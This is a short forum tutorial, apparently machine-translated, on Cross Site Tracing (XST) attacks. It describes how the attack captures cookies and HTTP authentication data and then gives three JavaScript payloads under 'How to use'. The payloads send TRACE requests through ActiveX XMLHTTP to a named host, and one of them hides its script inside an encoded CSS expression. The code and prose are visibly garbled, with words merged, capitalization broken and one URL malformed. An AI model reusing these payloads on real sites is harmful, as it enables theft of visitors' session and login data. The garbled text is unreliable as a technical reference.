Cross Site Tracing (XST) Attacks

Reprinted from: http://forum.eviloctal.com/thread-12959-1-1.html

XST attacks are a type of XSS attacks.

XST Attack Description:
Attackers embed malicious code into a web file on a controlled host. When a visitor browses, the malicious code is executed in the browser, then, the visitor's cookie, http basic verification, and htlm authentication information will be sent to the controlled host, and Trace requests will be sent to the target host, resulting in cookie spoofing or man-in-the-middle attacks.

XST attack conditions:
1. The target web server must allow Trace parameters;
2. A place to insert XST code is required;
3. The target site has a cross-origin vulnerability.

Comparison between XST and XSS:
Similarities: these attacks are highly fraudulent and can cause harm to affected hosts. Moreover, such attacks are based on multiple platforms and technologies, we can also use the Active controls, Flash, Java, and so on to perform XST and XSS attacks.
Advantage: normal http verification and NTLM verification can be bypassed.

How to use:

Method 1:

<ScriptType = "text/javascript">  <! --  FunctionXssTRACE (){  VarXmlHttp = newActivexobject ("Microsoft. XMLHTTP ");  XMLHTTP. Open ("trace", "http://wmjie.51.net/swords/", false );  XMLHTTP. Send ();  Xmldoc = XMLHTTP. responsetext;  Alert (xmldoc );  }  // -->  </SCRIPT>  <InputType = buttonOnclick = "xsstrace ();"Value = 'xssTrace '>

Method 2:

<ScriptType = "text/JavaScript">  <! --  FunctionXsstrace (){  VarOpenWin = open ("blank.htm", "swords", "width = 500, height = 400 ");  VarOtraceswords = openWin. external;  OpenWin. location. href = "http://wmjie.51.net/swords ";  SetTimeout (  Function(){  // The following must be written in one line  Otraceswords. NavigateAndFind ('Javascript: xmlHttp = new ActiveXObject ("Microsoft. XMLHTTP "); XmlHttp. open ("TRACE", "http://wmjie.51.net/swords/", false ); XmlHttp. send (); XmlDoc = xmlHttp. responseText; alert ("do not use events. cookie Display site wmjie.51.net/swords/. \ N"+Xmldoc );',"","");  },  1024  );  }  // -->  </SCRIPT>  <InputType = buttonOnclick = "xsstrace ();"Value = 'xssTrace '>

Method 3:

<ScriptType = "text/JavaScript">  FunctionXsstrace (){  VaRSwords = "VarXMLHTTP= NewActivexobject (\ "Microsoft. XMLHTTP \")\; XMLHTTP. Open (\ "trace \", \ "http: // http://www.tingh.com/\", false )\; XMLHTTP. Send () \; xmldoc = XMLHTTP. responsetext \; alert (xmldoc )\;";  VaRTarget="Http://wmjie.51.net/swords ";  Spinach=Encodeuricomponent (swords+'; Top. Close ()');  VaRReadycode='Font-size: Expression_r (execScript (decodeuricomponent ("'+Spinach+'")))';  Showmodaldialog (target,Null,Readycode );  }  </Script>  <INPUTTYPE = BUTTONOnClick = "xssTRACE ()"VALUE = 'xssTRACE '>